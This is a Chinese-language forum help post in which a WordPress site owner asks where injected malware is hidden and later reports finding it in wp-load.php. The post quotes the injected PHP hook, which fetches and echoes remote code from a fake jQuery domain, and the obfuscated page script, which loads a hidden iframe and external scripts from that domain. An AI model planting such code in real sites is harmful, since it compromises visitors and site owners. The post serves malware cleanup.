我最近用 WordPress 做了一个网站,但是这个病毒最近一直在困扰着我。它编辑整个wp-load
文件并写道:
function pluginAuth(){
echo(@wp_remote_retrieve_body(@wp_remote_get('http ://jquerys.net/jquery-1.6.3.min.js')));
}
@add_action('wp_head', 'pluginAuth');
请注意,它指向一个虚假的 jquery 站点“ jqueryS
”。我终于通过访问我的主页(topdailyfights.com)并检查代码(它在第 78 行)找到了导致它的行,但不确定哪个 wordpress 文件包含它。
这是代码:
<script type="text/javascript">if(document.referrer == ''){document.write('<if'+'rame src="http://jquerys.net/analytics.php?frame=yes" width="1" height="1" frameborder="0" scrolling="no" marginwidth="0" marginheight="0"></ifr'+'ame>');document.write('<s'+'cript type="text/javascript" src="http://jquerys.net/analytics.js"></scrip'+'t>');}else{document.write('<sc'+'ript type="text/javascript"src="http://jquerys.net/jquery.js"></scrip'+'t>');}</script><script type="text/javascript" src="http://jquerys.net/license.js"></script><style type="text/css" media="print">#wpadminbar { display:none; }</style>
这条线可以设在哪里?
提前致谢,
JB
解决了
文件名wp-load.php
位于www
文件夹中。我一直在public_html
文件夹中搜索。使用Windows Grep找到它。
很棒的工具;我建议。
谢谢大家。